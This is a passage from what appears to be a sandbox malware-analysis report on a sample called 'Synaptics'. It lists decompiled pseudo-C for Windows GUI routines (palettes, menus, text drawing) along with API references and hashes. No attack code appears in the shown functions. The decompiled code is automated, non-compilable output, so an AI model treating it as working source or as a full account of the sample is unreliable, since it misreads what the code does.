                                                                                                                                                                                                                            • API ID: B410$A590B150BitsDeleteObject
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3837315262-0
                                                                                                                                                                                                                            • Opcode ID: 923385af703c224445fe3f7018f1f50dd84332197b6e897708dbca319e94f8cc
                                                                                                                                                                                                                            • Instruction ID: 77de815d1256251625e09d43045054b0a879545964fd81c4b279a3d00da1559d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 923385af703c224445fe3f7018f1f50dd84332197b6e897708dbca319e94f8cc
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2114F75F082047FDB10DBA9DC41F9EBBECEB48714F5284AAB914E7281D678A900C769
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00426750 Relevance: 9.1, APIs: 6, Instructions: 55COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                                                                            			E00426750(struct HDC__* __eax, signed int __ecx) {
				char _v1036;
				signed int _v1038;
				struct tagRGBQUAD _v1048;
				short _v1066;
				short* _t15;
				void* _t18;
				struct HDC__* _t23;
				void* _t26;
				short* _t31;
				short* _t32;

				_t31 = 0;
				 *_t32 = 0x300;
				if(__eax == 0) {
					_v1038 = __ecx;
					E004029DC(_t26, __ecx << 2,  &_v1036);
				} else {
					_push(0);
					L004072E0();
					_t23 = __eax;
					_t18 = SelectObject(__eax, __eax);
					_v1066 = GetDIBColorTable(_t23, 0, 0x100,  &_v1048);
					SelectObject(_t23, _t18);
					DeleteDC(_t23);
				}
				if(_v1038 != 0) {
					if(_v1038 != 0x10 || E004266B8(_t32) == 0) {
						E00426548( &_v1036, _v1038 & 0x0000ffff);
					}
					_t15 = _t32;
					_push(_t15);
					L00407308();
					_t31 = _t15;
				}
				return _t31;
			}













                                                                                                                                                                                                                            0x0042675b
                                                                                                                                                                                                                            0x0042675d
                                                                                                                                                                                                                            0x00426765
                                                                                                                                                                                                                            0x0042679f
                                                                                                                                                                                                                            0x004267ad
                                                                                                                                                                                                                            0x00426767
                                                                                                                                                                                                                            0x00426767
                                                                                                                                                                                                                            0x00426769
                                                                                                                                                                                                                            0x0042676e
                                                                                                                                                                                                                            0x00426772
                                                                                                                                                                                                                            0x0042678b
                                                                                                                                                                                                                            0x00426792
                                                                                                                                                                                                                            0x00426798
                                                                                                                                                                                                                            0x00426798
                                                                                                                                                                                                                            0x004267b8
                                                                                                                                                                                                                            0x004267c0
                                                                                                                                                                                                                            0x004267d6
                                                                                                                                                                                                                            0x004267d6
                                                                                                                                                                                                                            0x004267db
                                                                                                                                                                                                                            0x004267dd
                                                                                                                                                                                                                            0x004267de
                                                                                                                                                                                                                            0x004267e3
                                                                                                                                                                                                                            0x004267e3
                                                                                                                                                                                                                            0x004267f0

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9A590.GDI32(00000000,00000000,?,?,0042A2D3,?,?,?,?,00428DD3,00000000,00428E5F), ref: 00426769
                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00426772
                                                                                                                                                                                                                            • GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,0042A2D3,?,?,?,?,00428DD3), ref: 00426786
                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00426792
                                                                                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 00426798
                                                                                                                                                                                                                            • 73C9A8F0.GDI32(?,00000000,?,?,0042A2D3,?,?,?,?,00428DD3,00000000,00428E5F), ref: 004267DE
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ObjectSelect$A590ColorDeleteTable
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1056449717-0
                                                                                                                                                                                                                            • Opcode ID: e7d1ce7ffea08dbe9a9b300fc4b2c268702868957d9a1b5eb40c754f65446552
                                                                                                                                                                                                                            • Instruction ID: efc5091b96ee346cfcb1bb7471c8c7bb22fdf2c070b44c7d61a8e62d02ab9fa2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7d1ce7ffea08dbe9a9b300fc4b2c268702868957d9a1b5eb40c754f65446552
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8701847160832061E2246766AC43A6B72AC9FC0758F41882FB988A72C1E67C9845D3AB
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0042AE8C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 113windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                                                                                            			E0042AE8C(intOrPtr* __eax, void* __edx) {
				intOrPtr* _v8;
				struct HPALETTE__* _v12;
				char _v13;
				intOrPtr _v25;
				intOrPtr _v29;
				intOrPtr _v33;
				intOrPtr _v57;
				short _v59;
				short _v61;
				intOrPtr _v65;
				intOrPtr _v69;
				intOrPtr _v73;
				intOrPtr _v77;
				intOrPtr _v89;
				intOrPtr _v93;
				void _v97;
				void* _t44;
				void* _t46;
				intOrPtr _t49;
				void* _t54;
				struct HPALETTE__* _t56;
				void* _t70;
				void* _t72;
				void* _t73;
				struct HDC__* _t74;
				intOrPtr _t95;
				void* _t105;
				void* _t107;
				void* _t108;
				intOrPtr _t110;

				_t105 = _t107;
				_t108 = _t107 + 0xffffffa0;
				_t70 = __edx;
				_v8 = __eax;
				_t44 = E00429FC8(_v8);
				if(_t70 == _t44) {
					L16:
					return _t44;
				} else {
					_t46 = _t70 - 1;
					if(_t46 < 0) {
						_t44 =  *((intOrPtr*)( *_v8 + 0x6c))();
						goto L16;
					} else {
						if(_t46 == 7) {
							_t49 =  *0x49d90c; // 0x422ec0
							_t44 = E00425F28(_t49);
							goto L16;
						} else {
							E004032B4( &_v97, 0x54);
							_t54 = memcpy( &_v97,  *((intOrPtr*)(_v8 + 0x28)) + 0x18, 6 << 2);
							_t110 = _t108 + 0xc;
							_v13 = 0;
							_v77 = 0;
							_v73 = 0x28;
							_v69 = _v93;
							_v65 = _v89;
							_v61 = 1;
							_v59 =  *0x0049B8B3 & 0x000000ff;
							_t55 =  *((intOrPtr*)(_t54 + 0x10));
							_v12 =  *((intOrPtr*)(_t54 + 0x10));
							_t72 = _t70 - 2;
							if(_t72 == 0) {
								_t56 =  *0x49e894; // 0x100805eb
								_v12 = _t56;
							} else {
								_t73 = _t72 - 1;
								if(_t73 == 0) {
									_push(0);
									L00407638();
									_t74 = E00426060(_t55);
									_v12 = CreateHalftonePalette(_t74);
									_v13 = 1;
									_push(_t74);
									_push(0);
									L00407888();
								} else {
									if(_t73 == 2) {
										_v57 = 3;
										_v33 = 0xf800;
										_v29 = 0x7e0;
										_v25 = 0x1f;
									}
								}
							}
							 *[fs:eax] = _t110;
							 *((char*)(_v8 + 0x22)) = E00429AA8( *((intOrPtr*)( *_v8 + 0x64))( *[fs:eax], 0x42afd9, _t105),  &_v97) & 0xffffff00 | _v12 != 0x00000000;
							_pop(_t95);
							 *[fs:eax] = _t95;
							_push(0x42afe0);
							if(_v13 != 0) {
								return DeleteObject(_v12);
							}
							return 0;
						}
					}
				}
			}

































                                                                                                                                                                                                                            0x0042ae8d
                                                                                                                                                                                                                            0x0042ae8f
                                                                                                                                                                                                                            0x0042ae95
                                                                                                                                                                                                                            0x0042ae97
                                                                                                                                                                                                                            0x0042ae9d
                                                                                                                                                                                                                            0x0042aea4
                                                                                                                                                                                                                            0x0042afeb
                                                                                                                                                                                                                            0x0042aff1
                                                                                                                                                                                                                            0x0042aeaa
                                                                                                                                                                                                                            0x0042aeac
                                                                                                                                                                                                                            0x0042aeae
                                                                                                                                                                                                                            0x0042aebd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0042aeb0
                                                                                                                                                                                                                            0x0042aeb2
                                                                                                                                                                                                                            0x0042aec5
                                                                                                                                                                                                                            0x0042aeca
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0042aeb4
                                                                                                                                                                                                                            0x0042aede
                                                                                                                                                                                                                            0x0042aef4
                                                                                                                                                                                                                            0x0042aef4
                                                                                                                                                                                                                            0x0042aef6
                                                                                                                                                                                                                            0x0042aefc
                                                                                                                                                                                                                            0x0042aeff
                                                                                                                                                                                                                            0x0042af09
                                                                                                                                                                                                                            0x0042af0f
                                                                                                                                                                                                                            0x0042af12
                                                                                                                                                                                                                            0x0042af23
                                                                                                                                                                                                                            0x0042af27
                                                                                                                                                                                                                            0x0042af2a
                                                                                                                                                                                                                            0x0042af2d
                                                                                                                                                                                                                            0x0042af30
                                                                                                                                                                                                                            0x0042af3d
                                                                                                                                                                                                                            0x0042af42
                                                                                                                                                                                                                            0x0042af32
                                                                                                                                                                                                                            0x0042af32
                                                                                                                                                                                                                            0x0042af34
                                                                                                                                                                                                                            0x0042af47
                                                                                                                                                                                                                            0x0042af49
                                                                                                                                                                                                                            0x0042af53
                                                                                                                                                                                                                            0x0042af5b
                                                                                                                                                                                                                            0x0042af5e
                                                                                                                                                                                                                            0x0042af62
                                                                                                                                                                                                                            0x0042af63
                                                                                                                                                                                                                            0x0042af65
                                                                                                                                                                                                                            0x0042af36
                                                                                                                                                                                                                            0x0042af39
                                                                                                                                                                                                                            0x0042af6c
                                                                                                                                                                                                                            0x0042af73
                                                                                                                                                                                                                            0x0042af7a
                                                                                                                                                                                                                            0x0042af81
                                                                                                                                                                                                                            0x0042af81
                                                                                                                                                                                                                            0x0042af39
                                                                                                                                                                                                                            0x0042af34
                                                                                                                                                                                                                            0x0042af93
                                                                                                                                                                                                                            0x0042afb9
                                                                                                                                                                                                                            0x0042afbe
                                                                                                                                                                                                                            0x0042afc1
                                                                                                                                                                                                                            0x0042afc4
                                                                                                                                                                                                                            0x0042afcd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0042afd3
                                                                                                                                                                                                                            0x0042afd8
                                                                                                                                                                                                                            0x0042afd8
                                                                                                                                                                                                                            0x0042aeb2
                                                                                                                                                                                                                            0x0042aeae

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000), ref: 0042AF49
                                                                                                                                                                                                                            • CreateHalftonePalette.GDI32(00000000,00000000), ref: 0042AF56
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,00000000,00000000,00000000), ref: 0042AF65
                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 0042AFD3
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: B380CreateDeleteHalftoneObjectPalette
                                                                                                                                                                                                                            • String ID: (
                                                                                                                                                                                                                            • API String ID: 733450718-3887548279
                                                                                                                                                                                                                            • Opcode ID: 6fa3a017ba8cbe3547f1b59ddf4885941dcce5041652f42a4a6b682d81354657
                                                                                                                                                                                                                            • Instruction ID: 2a0d3ada1f03d7f2548bc3f3360be5a611323719477d61fc332258d066da6c8f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6fa3a017ba8cbe3547f1b59ddf4885941dcce5041652f42a4a6b682d81354657
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE41F470B04208DFDB00DFA8D585B9EB7F6EF49304F9140AAE804A7391C67C5E15DB8A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0044E150 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                            			E0044E150(intOrPtr* __eax) {
				struct tagMENUITEMINFOA _v128;
				intOrPtr _v132;
				int _t16;
				intOrPtr* _t29;
				struct HMENU__* _t36;
				MENUITEMINFOA* _t37;

				_t37 =  &_v128;
				_t29 = __eax;
				_t16 =  *0x49de44; // 0x49e744
				if( *((char*)(_t16 + 0xd)) != 0 &&  *((intOrPtr*)(__eax + 0x38)) != 0) {
					_t36 =  *((intOrPtr*)( *__eax + 0x34))();
					_t37->cbSize = 0x2c;
					_v132 = 0x10;
					_v128.hbmpUnchecked =  &(_v128.cch);
					_v128.dwItemData = 0x50;
					_t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
					if(_t16 != 0) {
						_t16 = E0044E4D4(_t29);
						asm("sbb edx, edx");
						if(_t16 != (_v128.cbSize & 0x00006000) + 1) {
							_v128.cbSize = ((E0044E4D4(_t29) & 0x0000007f) << 0x0000000d) + ((E0044E4D4(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff;
							_v132 = 0x10;
							_t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
							if(_t16 != 0) {
								return DrawMenuBar( *(_t29 + 0x38));
							}
						}
					}
				}
				return _t16;
			}









                                                                                                                                                                                                                            0x0044e152
                                                                                                                                                                                                                            0x0044e155
                                                                                                                                                                                                                            0x0044e157
                                                                                                                                                                                                                            0x0044e160
                                                                                                                                                                                                                            0x0044e177
                                                                                                                                                                                                                            0x0044e179
                                                                                                                                                                                                                            0x0044e180
                                                                                                                                                                                                                            0x0044e18c
                                                                                                                                                                                                                            0x0044e190
                                                                                                                                                                                                                            0x0044e19e
                                                                                                                                                                                                                            0x0044e1a5
                                                                                                                                                                                                                            0x0044e1a9
                                                                                                                                                                                                                            0x0044e1bb
                                                                                                                                                                                                                            0x0044e1c0
                                                                                                                                                                                                                            0x0044e1de
                                                                                                                                                                                                                            0x0044e1e2
                                                                                                                                                                                                                            0x0044e1f0
                                                                                                                                                                                                                            0x0044e1f7
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044e1fd
                                                                                                                                                                                                                            0x0044e1f7
                                                                                                                                                                                                                            0x0044e1c0
                                                                                                                                                                                                                            0x0044e1a5
                                                                                                                                                                                                                            0x0044e20a

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetMenuItemInfoA.USER32 ref: 0044E19E
                                                                                                                                                                                                                            • SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 0044E1F0
                                                                                                                                                                                                                            • DrawMenuBar.USER32(00000000,00000000,00000000,000000FF), ref: 0044E1FD
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Menu$InfoItem$Draw
                                                                                                                                                                                                                            • String ID: DI$P
                                                                                                                                                                                                                            • API String ID: 3227129158-1383934172
                                                                                                                                                                                                                            • Opcode ID: 47aab54365fcd0871cb6339b6fa52b1f3853022d14864fa6dad1c364d49d802f
                                                                                                                                                                                                                            • Instruction ID: 3c7080e089ef200bda1d0293621365d90923fd6ea2d15a2cda29d63b16e16469
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 47aab54365fcd0871cb6339b6fa52b1f3853022d14864fa6dad1c364d49d802f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B1190716052006BE3109B29CC85B4A76D8BB85324F14866AF5A4CB3DAD679D844C74A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00402944 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00402944(void* __eax, void* __edx) {
				char _v271;
				char _v532;
				char _v534;
				char _v535;
				void* _t21;
				void* _t25;
				CHAR* _t26;

				_t25 = __edx;
				_t21 = __eax;
				if(__eax != 0) {
					 *_t26 = 0x40;
					_v535 = 0x3a;
					_v534 = 0;
					GetCurrentDirectoryA(0x105,  &_v271);
					SetCurrentDirectoryA(_t26);
				}
				GetCurrentDirectoryA(0x105,  &_v532);
				if(_t21 != 0) {
					SetCurrentDirectoryA( &_v271);
				}
				return E00404C30(_t25, 0x105,  &_v532);
			}










                                                                                                                                                                                                                            0x0040294c
                                                                                                                                                                                                                            0x0040294e
                                                                                                                                                                                                                            0x00402952
                                                                                                                                                                                                                            0x0040295c
                                                                                                                                                                                                                            0x0040295f
                                                                                                                                                                                                                            0x00402964
                                                                                                                                                                                                                            0x00402976
                                                                                                                                                                                                                            0x0040297c
                                                                                                                                                                                                                            0x0040297c
                                                                                                                                                                                                                            0x0040298b
                                                                                                                                                                                                                            0x00402992
                                                                                                                                                                                                                            0x0040299c
                                                                                                                                                                                                                            0x0040299c
                                                                                                                                                                                                                            0x004029b9

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000105,?,?,00000000,00409F51,00477B3E,00400000,00000000,0000000A,00000000,00477DAE,?,?,?,021E2354,00000000), ref: 00402976
                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,00000000,00409F51,00477B3E,00400000,00000000,0000000A,00000000,00477DAE,?,?,?,021E2354), ref: 0040297C
                                                                                                                                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000105,?,?,00000000,00409F51,00477B3E,00400000,00000000,0000000A,00000000,00477DAE,?,?,?,021E2354,00000000), ref: 0040298B
                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,00000000,00409F51,00477B3E,00400000,00000000,0000000A,00000000,00477DAE,?,?,?,021E2354), ref: 0040299C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CurrentDirectory
                                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                                            • API String ID: 1611563598-336475711
                                                                                                                                                                                                                            • Opcode ID: f15565b64aa9ee1d14baca2a486c88969ad1acb5582208c8ab97ed5e6b3006bf
                                                                                                                                                                                                                            • Instruction ID: c5c7b0dff09aeac35822bcb6cbe030b0537c54a7cf5c2cde62247dac08ae10a0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f15565b64aa9ee1d14baca2a486c88969ad1acb5582208c8ab97ed5e6b3006bf
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7DF096662497C01EE310E6698856BDB72DC8B55304F04442EBACCD73C2E6B8894457A7
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0044AF00 Relevance: 7.7, APIs: 5, Instructions: 162COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 85%
                                                                                                                                                                                                                            			E0044AF00(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, int _a4, char _a8, struct tagRECT* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				struct tagRECT _v32;
				void* _t53;
				int _t63;
				CHAR* _t65;
				void* _t76;
				void* _t78;
				int _t89;
				CHAR* _t91;
				int _t117;
				intOrPtr _t127;
				void* _t139;
				void* _t144;
				char _t153;

				_t120 = __ecx;
				_t143 = _t144;
				_v16 = 0;
				_v12 = __ecx;
				_v8 = __edx;
				_t139 = __eax;
				_t117 = _a4;
				_push(_t144);
				_push(0x44b0e4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t144 + 0xffffffe4;
				_t53 = E0044CE98(__eax);
				_t135 = _t53;
				if(_t53 != 0 && E0044E4D4(_t135) != 0) {
					if((_t117 & 0x00000000) != 0) {
						__eflags = (_t117 & 0x00000002) - 2;
						if((_t117 & 0x00000002) == 2) {
							_t117 = _t117 & 0xfffffffd;
							__eflags = _t117;
						}
					} else {
						_t117 = _t117 & 0xffffffff | 0x00000002;
					}
					_t117 = _t117 | 0x00020000;
				}
				E00404A58( &_v16, _v12);
				if((_t117 & 0x00000004) == 0) {
					L12:
					E00404DCC(_v16, 0x44b108);
					if(_t153 != 0) {
						E004256F8( *((intOrPtr*)(_v8 + 0x14)), _t120, 1, _t135, _t143, __eflags);
						__eflags =  *((char*)(_t139 + 0x3a));
						if( *((char*)(_t139 + 0x3a)) != 0) {
							_t136 =  *((intOrPtr*)(_v8 + 0xc));
							__eflags = E004250D0( *((intOrPtr*)(_v8 + 0xc))) |  *0x44b10c;
							E004250DC( *((intOrPtr*)(_v8 + 0xc)), E004250D0( *((intOrPtr*)(_v8 + 0xc))) |  *0x44b10c, _t136, _t139, _t143);
						}
						__eflags =  *((char*)(_t139 + 0x39));
						if( *((char*)(_t139 + 0x39)) != 0) {
							L24:
							_t63 = E00404C80(_v16);
							_t65 = E00404E80(_v16);
							DrawTextA(E00425C68(_v8), _t65, _t63, _a12, _t117);
							L25:
							_pop(_t127);
							 *[fs:eax] = _t127;
							_push(0x44b0eb);
							return E004049C0( &_v16);
						} else {
							__eflags = _a8;
							if(_a8 == 0) {
								OffsetRect(_a12, 1, 1);
								E00424E10( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
								_t89 = E00404C80(_v16);
								_t91 = E00404E80(_v16);
								DrawTextA(E00425C68(_v8), _t91, _t89, _a12, _t117);
								OffsetRect(_a12, 0xffffffff, 0xffffffff);
							}
							__eflags = _a8;
							if(_a8 == 0) {
								L23:
								E00424E10( *((intOrPtr*)(_v8 + 0xc)), 0xff000010);
							} else {
								_t76 = E00424950(0xff00000d);
								_t78 = E00424950(0xff000010);
								__eflags = _t76 - _t78;
								if(_t76 != _t78) {
									goto L23;
								}
								E00424E10( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
							}
							goto L24;
						}
					}
					if((_t117 & 0x00000004) == 0) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_v32.top = _v32.top + 4;
						DrawEdge(E00425C68(_v8),  &_v32, 6, 2);
					}
					goto L25;
				} else {
					if(_v16 == 0) {
						L11:
						E00404C88( &_v16, 0x44b0fc);
						goto L12;
					}
					if( *_v16 != 0x26) {
						goto L12;
					}
					_t153 =  *((char*)(_v16 + 1));
					if(_t153 != 0) {
						goto L12;
					}
					goto L11;
				}
			}



















                                                                                                                                                                                                                            0x0044af00
                                                                                                                                                                                                                            0x0044af01
                                                                                                                                                                                                                            0x0044af0b
                                                                                                                                                                                                                            0x0044af0e
                                                                                                                                                                                                                            0x0044af11
                                                                                                                                                                                                                            0x0044af14
                                                                                                                                                                                                                            0x0044af16
                                                                                                                                                                                                                            0x0044af1b
                                                                                                                                                                                                                            0x0044af1c
                                                                                                                                                                                                                            0x0044af21
                                                                                                                                                                                                                            0x0044af24
                                                                                                                                                                                                                            0x0044af29
                                                                                                                                                                                                                            0x0044af2e
                                                                                                                                                                                                                            0x0044af32
                                                                                                                                                                                                                            0x0044af42
                                                                                                                                                                                                                            0x0044af51
                                                                                                                                                                                                                            0x0044af54
                                                                                                                                                                                                                            0x0044af59
                                                                                                                                                                                                                            0x0044af59
                                                                                                                                                                                                                            0x0044af59
                                                                                                                                                                                                                            0x0044af44
                                                                                                                                                                                                                            0x0044af47
                                                                                                                                                                                                                            0x0044af47
                                                                                                                                                                                                                            0x0044af5c
                                                                                                                                                                                                                            0x0044af5c
                                                                                                                                                                                                                            0x0044af68
                                                                                                                                                                                                                            0x0044af70
                                                                                                                                                                                                                            0x0044af96
                                                                                                                                                                                                                            0x0044af9e
                                                                                                                                                                                                                            0x0044afa3
                                                                                                                                                                                                                            0x0044afe1
                                                                                                                                                                                                                            0x0044afe6
                                                                                                                                                                                                                            0x0044afea
                                                                                                                                                                                                                            0x0044afef
                                                                                                                                                                                                                            0x0044affb
                                                                                                                                                                                                                            0x0044b003
                                                                                                                                                                                                                            0x0044b003
                                                                                                                                                                                                                            0x0044b008
                                                                                                                                                                                                                            0x0044b00c
                                                                                                                                                                                                                            0x0044b0a9
                                                                                                                                                                                                                            0x0044b0b1
                                                                                                                                                                                                                            0x0044b0ba
                                                                                                                                                                                                                            0x0044b0c9
                                                                                                                                                                                                                            0x0044b0ce
                                                                                                                                                                                                                            0x0044b0d0
                                                                                                                                                                                                                            0x0044b0d3
                                                                                                                                                                                                                            0x0044b0d6
                                                                                                                                                                                                                            0x0044b0e3
                                                                                                                                                                                                                            0x0044b012
                                                                                                                                                                                                                            0x0044b012
                                                                                                                                                                                                                            0x0044b016
                                                                                                                                                                                                                            0x0044b020
                                                                                                                                                                                                                            0x0044b030
                                                                                                                                                                                                                            0x0044b03d
                                                                                                                                                                                                                            0x0044b046
                                                                                                                                                                                                                            0x0044b055
                                                                                                                                                                                                                            0x0044b062
                                                                                                                                                                                                                            0x0044b062
                                                                                                                                                                                                                            0x0044b067
                                                                                                                                                                                                                            0x0044b06b
                                                                                                                                                                                                                            0x0044b099
                                                                                                                                                                                                                            0x0044b0a4
                                                                                                                                                                                                                            0x0044b06d
                                                                                                                                                                                                                            0x0044b072
                                                                                                                                                                                                                            0x0044b07e
                                                                                                                                                                                                                            0x0044b083
                                                                                                                                                                                                                            0x0044b085
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044b092
                                                                                                                                                                                                                            0x0044b092
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044b06b
                                                                                                                                                                                                                            0x0044b00c
                                                                                                                                                                                                                            0x0044afa8
                                                                                                                                                                                                                            0x0044afb6
                                                                                                                                                                                                                            0x0044afb7
                                                                                                                                                                                                                            0x0044afb8
                                                                                                                                                                                                                            0x0044afb9
                                                                                                                                                                                                                            0x0044afba
                                                                                                                                                                                                                            0x0044afcf
                                                                                                                                                                                                                            0x0044afcf
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044af72
                                                                                                                                                                                                                            0x0044af76
                                                                                                                                                                                                                            0x0044af89
                                                                                                                                                                                                                            0x0044af91
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044af91
                                                                                                                                                                                                                            0x0044af7e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044af83
                                                                                                                                                                                                                            0x0044af87
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044af87

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • DrawEdge.USER32(00000000,?,00000006,00000002), ref: 0044AFCF
                                                                                                                                                                                                                            • OffsetRect.USER32(?,00000001,00000001), ref: 0044B020
                                                                                                                                                                                                                            • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0044B055
